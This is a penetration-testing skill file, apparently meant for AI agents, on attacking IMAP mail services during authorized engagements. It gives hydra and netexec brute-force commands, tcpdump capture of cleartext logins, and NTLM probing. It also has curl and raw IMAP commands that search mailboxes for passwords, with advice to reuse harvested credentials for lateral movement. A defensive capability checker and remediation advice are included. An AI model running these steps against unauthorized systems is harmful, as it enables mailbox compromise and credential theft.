pentesting-imap (`.github/skills/pentesting-imap/SKILL.md`)
Install: `npx mdskill add xalgord/xalgorix/pentesting-imap`
---
name: pentesting-imap
description: Testing IMAP services (default ports 143 cleartext, 993 IMAPS) for weak/default credentials and brute force, NTLM info disclosure, cleartext credential exposure, capability enumeration, and authenticated mailbox access/data extraction via raw IMAP commands and curl during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- imap
version: '1.0'
author: xalgorix
license: Apache-2.0
---
# Pentesting IMAP (ports 143, 993)
## When to Use
- Default ports: `143/tcp` (cleartext IMAP) and `993/tcp` (IMAP over TLS / IMAPS).
- When `nmap`/banner shows `imap`, an `* OK ... IMAP4` greeting, or Dovecot/Courier/Exchange IMAP.
- For credential testing and post-auth mailbox data extraction (emails often hold reusable secrets).
## Quick Enumeration
```bash
# Cleartext banner
nc -nv <IP> 143
# IMAPS banner
openssl s_client -connect <IP>:993 -quiet
# Capabilities + NTLM info
nmap --script "imap-capabilities or imap-ntlm-info" -sV -p 143,993 <IP>
# Shodan-style discovery markers
# port:143 CAPABILITY | port:993 CAPABILITY
```
## Critical: Checks Most Often Missed
- **Cleartext credentials on 143** — `LOGIN user pass` over port 143 (no STARTTLS) is sniffable.
  - How to CONFIRM: capture with `tcpdump -i eth0 -A 'tcp port 143'` and observe the `A1 LOGIN` line; check `CAPABILITY` for the absence of `LOGINDISABLED`/`STARTTLS`.
- **NTLM info disclosure** — `AUTHENTICATE NTLM` leaks Windows/domain build info on Exchange.
  - How to CONFIRM:
    ```bash
    nmap -p143 --script imap-ntlm-info <IP>
    # or manual:
    telnet <IP> 143
    a1 AUTHENTICATE NTLM
    TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= # Type-1; server returns Type-2 with metadata
    ```
- **Weak/default credentials** — reused or guessable mailbox passwords; brute-forceable.
  - How to CONFIRM: `hydra -l <user> -P passwords.txt imap://<IP>` returns a valid login.
- **Authenticated mailbox data exposure** — once logged in, mailboxes frequently contain passwords, internal hostnames, and VPN/onboarding secrets that scanners never read.
  - How to CONFIRM: search bodies for `password` (see curl `TEXT password` below).
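The CAPABILITY check above (and the tagged-command model from Key Concepts) as a small verifier, added here as an example and not part of the skill: it sends a tagged `CAPABILITY`, parses the untagged reply, and reports whether a port-143 listener still accepts cleartext `LOGIN`. The hostname is a placeholder; the parsing and assessment helpers run offline on a constructed capability line.

```python
"""Check an IMAP listener's advertised capabilities for the cleartext-auth gap."""
import sys
import imaplib


def parse_capabilities(line: str) -> set[str]:
    """Normalise '* CAPABILITY IMAP4rev1 STARTTLS ...' (or the bare token list
    imaplib hands back) into an upper-cased set of capability atoms."""
    tokens = line.strip().split()
    if tokens[:2] == ["*", "CAPABILITY"]:
        tokens = tokens[2:]
    return {t.upper() for t in tokens}


def assess(caps: set[str], port: int) -> list[str]:
    """Map the advertised capabilities to the checks this skill says are missed.
    An empty list means the listener enforces TLS before authentication
    (e.g. Dovecot with disable_plaintext_auth = yes, which makes it
    advertise LOGINDISABLED on the cleartext port)."""
    findings: list[str] = []
    if port == 143 and "LOGINDISABLED" not in caps:
        if "STARTTLS" in caps:
            findings.append("STARTTLS offered but not enforced: LOGIN accepted before TLS")
        else:
            findings.append("cleartext LOGIN accepted on 143 (no STARTTLS, no LOGINDISABLED)")
    if "AUTH=NTLM" in caps:
        findings.append("AUTH=NTLM advertised: NTLM challenge discloses host/domain metadata")
    return findings


def probe(host: str, port: int = 143) -> tuple[str, list[str]]:
    """Connect, read the greeting, issue a tagged CAPABILITY and assess the reply.
    imaplib prefixes the command with its own tag and matches the echoed tag."""
    conn = imaplib.IMAP4_SSL(host, port) if port == 993 else imaplib.IMAP4(host, port)
    greeting = conn.welcome.decode(errors="replace")  # the '* OK ... IMAP4' banner
    _, data = conn.capability()  # data[0] is the body of the untagged '* CAPABILITY' line
    caps = parse_capabilities(data[0].decode(errors="replace"))
    conn.logout()
    return greeting, assess(caps, port)


if __name__ == "__main__":
    # Placeholder target; replace with the in-scope host from the engagement.
    target = sys.argv[1] if len(sys.argv) > 1 else "imap.example.invalid"
    banner, gaps = probe(target, 143)
    print(banner.strip())
    print("\n".join(gaps) or "no cleartext-auth gap advertised")
```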
## Workflow
### Step 1: Enumerate (capabilities, version, NTLM)
```bash
nc -nv <IP> 143
openssl s_client -connect <IP>:993 -quiet
nmap --script "imap-capabilities or imap-ntlm-info" -sV -p 143,993 <IP>
msfconsole -q -x 'use auxiliary/scanner/imap/imap_version; set RHOSTS <IP>; set RPORT 143; run; exit'
```
### Step 2: Authenticate (default creds, brute force)
```bash
# Brute force (use IMAPS port for cleartext-disabled servers)
hydra -L users.txt -P passwords.txt -f imap://<IP>
hydra -l <user> -P passwords.txt -f imaps://<IP>
nxc imap <IP> -u users.txt -p passwords.txt
# Manual login (tagged commands; quote values containing spaces)
openssl s_client -connect <IP>:993 -quiet
A1 LOGIN "username" "password"
```
### Step 3: Exploit / Extract (browse + dump mailboxes)
```bash
# Raw IMAP command flow after login
A1 LIST "" * # list all mailboxes/folders
A1 SELECT INBOX # open mailbox
A1 STATUS INBOX (MESSAGES UNSEEN RECENT)
A1 FETCH 1:* (FLAGS) # list messages
A1 FETCH 2 body[text] # retrieve message body
A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[])
A1 LOGOUT
# curl-driven extraction (IMAPS)
curl -k 'imaps://<IP>/' --user user:pass # list mailboxes
curl -k 'imaps://<IP>/INBOX?ALL' --user user:pass # message indices
curl -k 'imaps://<IP>/Drafts?TEXT password' --user user:pass # search bodies for "password"
curl -k 'imaps://<IP>/Drafts;MAILINDEX=1' --user user:pass # download a message
# Pull subject+sender of the first 5 messages
for m in {1..5}; do
curl -k "imaps://<IP>/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass
done
```
### Step 4: Post-access / pivot
- Grep extracted mail for credentials, password-reset links, internal hostnames, and VPN/onboarding details.
- Reuse harvested credentials against SMTP/OWA/SSH/VPN; map internal topology from message headers.
- A GUI client like `evolution` (`apt install evolution`) speeds up manual triage of large mailboxes.
## Key Concepts
| Concept | Description |
|---------|-------------|
| **IMAP vs POP3** | IMAP keeps mail server-side and supports multi-device access and folder structure. |
| **Tagged commands** | Each command is prefixed with a tag (`A1`) the server echoes in its response. |
| **CAPABILITY** | Advertises features such as `STARTTLS`, `LOGINDISABLED`, `AUTH=` mechanisms. |
| **Cleartext exposure** | `LOGIN` on 143 without STARTTLS sends credentials in plaintext. |
| **NTLM disclosure** | `AUTHENTICATE NTLM` on Exchange leaks NetBIOS/DNS/OS build. |
| **Mailbox data mining** | Authenticated `FETCH`/`SEARCH` (or curl) extracts message bodies containing secrets. |
## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nmap NSE** | `imap-capabilities`, `imap-ntlm-info`. |
| **nc / openssl s_client** | Banner grab, manual cleartext/TLS IMAP sessions. |
| **curl** | Scriptable mailbox listing, searching, and message download over IMAP(S). |
| **hydra / netexec (nxc)** | Credential brute force / spraying. |
| **Metasploit** | `scanner/imap/imap_version`. |
| **evolution** | GUI client for browsing compromised mailboxes. |
| **tcpdump / Wireshark** | Capture cleartext credentials on port 143. |
## Common Scenarios
### Scenario 1: Cleartext IMAP credential capture
Port 143 lacks STARTTLS. A MitM + `tcpdump 'tcp port 143'` captures `A1 LOGIN user pass` in plaintext, which is then reused on the corporate VPN.
### Scenario 2: Brute force → mailbox secrets
`hydra imaps://<IP>` finds `jdean:PA$$W0RD`. `curl 'imaps://<IP>/INBOX?TEXT password'` surfaces an email containing RDP credentials, enabling lateral movement.
### Scenario 3: Exchange NTLM disclosure
`nmap -p143 --script imap-ntlm-info` returns the NetBIOS name, domain, and OS build, aiding AD reconnaissance and target selection.
## Output Format
```
## IMAP Finding
**Service**: IMAP
**Port**: 143/tcp (Dovecot, STARTTLS not enforced)
**Severity**: High
**Finding**: Cleartext authentication + weak credentials with sensitive mailbox content
**Evidence**:
- CAPABILITY lacked LOGINDISABLED; tcpdump captured "A1 LOGIN jdean PA$$W0RD"
- curl 'imaps://<IP>/INBOX?TEXT password' returned message with RDP creds
**Impact**: Credentials are exposed on the wire and mailbox content discloses additional secrets enabling lateral movement.
**Recommendation**:
1. Enforce TLS (require STARTTLS or IMAPS only; set LOGINDISABLED on 143).
2. Enforce strong, unique mailbox passwords and rate-limit auth.
3. Educate users not to store credentials in email.
```